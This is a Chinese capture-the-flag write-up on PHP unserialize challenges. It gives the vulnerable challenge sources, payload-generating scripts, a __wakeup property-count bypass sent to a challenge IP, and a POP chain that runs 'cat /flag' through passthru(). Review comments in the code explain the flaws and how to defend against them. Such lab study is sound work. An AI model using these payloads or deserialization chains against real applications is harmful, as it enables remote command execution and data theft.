攻防世界
unserialize3
__wakeup 绕过：当序列化字符串中声明的属性个数大于对象实际的属性个数时，存在该缺陷的旧版 PHP 会跳过 __wakeup()；已修复的 PHP 版本不受此影响。
class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
?code=
<?php
/**
 * Local copy of the challenge class shown above.
 *
 * It is declared here only so that serialize() emits the same class name
 * and property name as the class on the server.
 */
class xctf{
public $flag = '111';
// unserialize() calls __wakeup() on the rebuilt object; this one ends the request at once.
// NOTE(review): a magic method is not a dependable input filter. Reject or validate the
// data before it reaches unserialize() rather than relying on __wakeup() to stop it.
public function __wakeup(){
exit('bad requests');
}
}
// Instantiate the class and print its serialized form.
// serialize() records one property for this object, while the request printed after this
// listing declares 3. NOTE(review): that count mismatch is what the bypass described at the
// top of the write-up depends on, so it only applies to PHP builds with the unpatched
// unserialize() behaviour; on fixed builds __wakeup() still runs.
$a = new xctf();
echo(serialize($a));
?>
http://61.147.171.105:61734?code=O:4:"xctf":3:{s:4:"flag";s:3:"111";}
得到flag:cyberpeace{e40f96c8dc00bbd08233834d6c5aa473}
a1natas ctf
PHP_UNSERIALIZE ( 1 )
打开什么都没有
dirsearch
得到php文件
<?php
/**
 * Challenge class with two public properties and a destructor that can run a shell command.
 *
 * SECURITY: when an instance is created by unserialize(), __construct() is not called, so
 * $name and $type hold whatever the serialized data supplied. The equality check in
 * __destruct() is therefore not an access control.
 */
class ctf{
public $name;
public $type;
// Both arguments are ignored; the properties always receive these fixed strings.
function __construct($name, $type){
$this->name = "AsaL1n";
$this->type = "web";
}
// Runs when the object is destroyed, including objects produced by unserialize().
function __destruct(){
if($this->name==="newstar"&&$this->type==="winner"){
// SECURITY: the raw POST field is handed to system() with no validation or escaping,
// which is arbitrary command execution for whoever reaches this branch.
$cmd=$_POST['cmd'];
system($cmd);
}
}
}
// Read the POST field "weber" as-is.
$hello=$_POST["weber"];
// SECURITY: unserialize() on request data lets the client choose the class and property
// values of the object that gets built, and its __destruct() then runs with those values.
// Use a data-only format such as json_decode(), or pass ['allowed_classes' => false].
if(isset($hello)){
unserialize($hello);
}
?>
编写payload
PHP_UNSERIALIZE ( 2 )
<?php
// Turn off PHP error reporting for this request.
error_reporting(0);
// Print this file's own source as highlighted HTML, so every visitor can read the code below.
highlight_file(__FILE__);
/**
 * Challenge class whose destructor prints the MD5 of $name.
 *
 * unserialize() does not call __construct(), so for a deserialized instance $name is
 * whatever the serialized data contained, including another object.
 */
class ctf{
public $name;
public $type;
// Both arguments are ignored; the properties always receive these fixed strings.
function __construct($name, $type){
$this->name = "AsaL1n";
$this->type = "web";
}
// md5() needs a string, so an object stored in $name is converted through its
// __toString() method here. That conversion is the hand-off into class welcome.
function __destruct(){
echo md5($this->name);
}
}
/**
 * Challenge class whose string conversion calls whatever is stored in $web.
 */
class welcome{
public $web;
// Invokes $this->web as a callable and returns its result.
// SECURITY: $web is never checked; if it holds an object, calling it runs that object's
// __invoke() method, so the data decides which code executes.
function __toString()
{
$func=$this->web;
return $func();
}
}
/**
 * Challenge class that executes $flag as a shell command when the object is called.
 */
class world{
public $flag;
// SECURITY: passthru() runs the property value as a command and streams the output.
// With a deserialized instance that value comes straight from the request.
function __invoke(){
passthru($this->flag);
}
}
// Read the POST field "weber" as-is.
$hello=$_POST["weber"];
// SECURITY: unserialize() on request data may instantiate any class loaded in this script
// (ctf, welcome, world), and their magic methods then run on client-chosen property values.
// Use json_decode() for data, or pass ['allowed_classes' => false] to unserialize().
if(isset($hello)){
unserialize($hello);
}
?>
编写payload:
<?php
// Property-only stub of the challenge's ctf class: no methods are declared, only the class
// name and public property names that serialize() writes into its output.
class ctf{
public $name;
public $type;
}
// Property-only stub of the challenge's welcome class; no methods are declared.
class welcome{
public $web;
}
// Property-only stub of the challenge's world class; no methods are declared.
class world{
public $flag;
}
// Nest the three stubs (ctf -> welcome -> world), set the innermost property, and print
// the serialized result.
// NOTE(review): every class named in the output is one the challenge script already
// defines. Restricting allowed_classes, or not unserializing request data at all,
// is what stops such an object graph from being rebuilt on the server.
$a=new ctf();
$a->name=new welcome();
$a->name->web=new world();
$a->name->web->flag="cat /flag";
echo (serialize($a));
?>
NSS
[SWPUCTF 2021 新生赛]no_wakeup
<?php
// Declare the response as UTF-8 HTML.
header("Content-type:text/html;charset=utf-8");
// Turn off PHP error reporting for this request.
error_reporting(0);
// Print the source of class.php to every visitor.
show_source("class.php");
/**
 * Challenge class that reveals $flag from flag.php when $admin and $passwd match fixed strings.
 *
 * SECURITY: the only thing between request data and the flag branch is __wakeup().
 * unserialize() skips __construct(), so both properties come from the serialized input.
 */
class HaHaHa{
public $admin;
public $passwd;
// Defaults for objects created with new; not used when the object comes from unserialize().
public function __construct(){
$this->admin ="user";
$this->passwd = "123456";
}
// Called by unserialize(): replaces $passwd with its SHA-1 hex digest. A 40-character
// digest can never equal "wllm", so the check in __destruct() passes only if this did not run.
public function __wakeup(){
$this->passwd = sha1($this->passwd);
}
// Runs when the object is destroyed.
public function __destruct(){
if($this->admin === "admin" && $this->passwd === "wllm"){
// $flag is not defined in this class; presumably flag.php sets it (not shown on the page).
include("flag.php");
echo $flag;
}else{
// Echoes the (possibly hashed) $passwd value back into the response.
echo $this->passwd;
echo "No wake up";
}
}
}
// Read the query parameter "p" as-is.
$Letmeseesee = $_GET['p'];
// SECURITY: unserialize() on a URL parameter lets the client set every property of the
// HaHaHa object, and there is no isset() check or class restriction here.
// Use json_decode() for data, or pass ['allowed_classes' => false] to unserialize().
unserialize($Letmeseesee);
?>
<?php
// Property-only stub of the challenge's HaHaHa class, with the two values that
// __destruct() compares against as defaults. No magic methods are declared here.
class HaHaHa{
public $admin="admin";
public $passwd="wllm";
}
// Instantiate the stub and print its serialized form, which declares 2 properties.
// NOTE(review): as printed, this string would still go through __wakeup() on the server and
// $passwd would be hashed. The write-up presumably changes the declared count as in the
// first challenge, but the page does not show that step; it applies only to PHP builds
// with the unpatched unserialize() behaviour.
$a=new HaHaHa();
echo serialize($a);
?>